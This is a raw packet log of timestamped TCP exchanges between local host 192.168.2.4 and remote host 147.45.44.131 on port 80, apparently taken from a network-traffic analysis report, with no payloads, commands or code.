Jan 2, 2025 19:13:04.597897053 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597898960 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597908974 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597918034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597929001 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597935915 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597954035 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597965956 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597975969 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597984076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597994089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598004103 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598009109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598021984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598038912 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598040104 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598040104 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598057032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598059893 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598067999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598077059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598084927 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598094940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598104954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598114014 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598114014 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598136902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598145008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598148108 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598159075 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598175049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598182917 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598184109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598193884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598205090 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598205090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598253012 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598781109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598872900 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598877907 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598886967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598896027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598903894 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598916054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598926067 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598928928 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598928928 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.598934889 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.598947048 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.600950003 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.601032972 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.601036072 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.601044893 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.601052999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.601062059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.601073027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.601083040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.601083994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.601083994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.601093054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.601129055 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.602797031 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.602804899 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.602818966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.602828026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.602844000 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.602844000 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.602844000 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.602853060 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.602874041 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.602900028 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.602909088 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.602920055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.602965117 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.603930950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.603945971 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.603954077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604007006 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.604017973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604026079 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604033947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604047060 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604052067 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.604055882 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604067087 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604095936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604104042 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.604104042 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.604104996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604120970 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604126930 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.604130030 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604140043 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604157925 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.604170084 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.604207039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604223013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604232073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604242086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604252100 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604262114 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604271889 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604278088 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.604278088 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.604280949 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.604311943 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.604311943 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.683343887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683399916 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683414936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683423996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683434010 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683451891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683474064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.683474064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.683495045 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.683499098 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683509111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683517933 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683527946 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683536053 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.683538914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683547974 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683556080 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683564901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683576107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683592081 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.683592081 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.683608055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683617115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683625937 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683634996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683645010 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683659077 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.683659077 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.683660984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.683670998 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684266090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684281111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684288025 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684303999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684314013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684334040 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684334040 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684335947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684348106 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684350967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684360981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684369087 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684390068 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684391022 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684400082 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684417963 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684454918 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684467077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684544086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684551954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684561968 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684572935 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684581995 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684585094 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684591055 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684608936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684617996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684628010 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684633017 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684643984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684652090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684659958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684670925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684674025 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684674025 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684700012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684700966 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684709072 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684717894 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684727907 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684735060 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684737921 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684802055 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684802055 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684843063 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684851885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684859991 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684873104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684883118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684886932 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684891939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684900999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684911013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684920073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684927940 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684927940 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684931040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684948921 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.684963942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684978008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684987068 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.684994936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685009956 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.685009956 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.685010910 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685022116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685023069 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.685029984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685039997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685050011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685058117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685066938 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685075998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685086012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685086966 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.685086966 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.685101986 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.685123920 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.685609102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685619116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685626984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685651064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.685652971 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685662985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685672998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685673952 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.685682058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.685704947 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.685726881 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.687764883 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.687773943 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.687783003 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.687834978 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.687840939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.687849045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.687858105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.687866926 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.687877893 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.687890053 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.687890053 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.687902927 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.689697027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.689704895 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.689713001 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.689728022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.689737082 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.689744949 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.689755917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.689766884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.689771891 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.689773083 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.689773083 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.689807892 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.690799952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.690823078 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.690830946 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.690870047 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.690937042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.690949917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.690958977 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.690973997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.690975904 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.690985918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.690994978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691001892 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.691004992 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691013098 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.691015005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691024065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691039085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691046953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691054106 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691057920 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.691068888 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691071033 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.691081047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691088915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691093922 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.691101074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691108942 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.691108942 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.691111088 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691122055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691131115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.691165924 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.691175938 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.770275116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770292997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770302057 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770315886 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770325899 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770338058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770344019 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.770347118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770355940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770365953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770369053 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.770375013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770386934 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770394087 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.770409107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770416021 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.770418882 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770432949 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770447016 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770457029 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770457029 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.770472050 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770481110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770492077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770504951 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.770504951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770504951 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.770515919 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.770517111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.770556927 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771135092 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771155119 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771164894 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771178007 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771220922 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771256924 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771265984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771274090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771289110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771298885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771307945 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771317959 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771317959 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771328926 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771338940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771342993 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771348953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771357059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771367073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771375895 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771393061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771403074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771410942 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771410942 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771410942 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771419048 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771430969 CET	80	49731	147.45.44.131	192.168.2.4
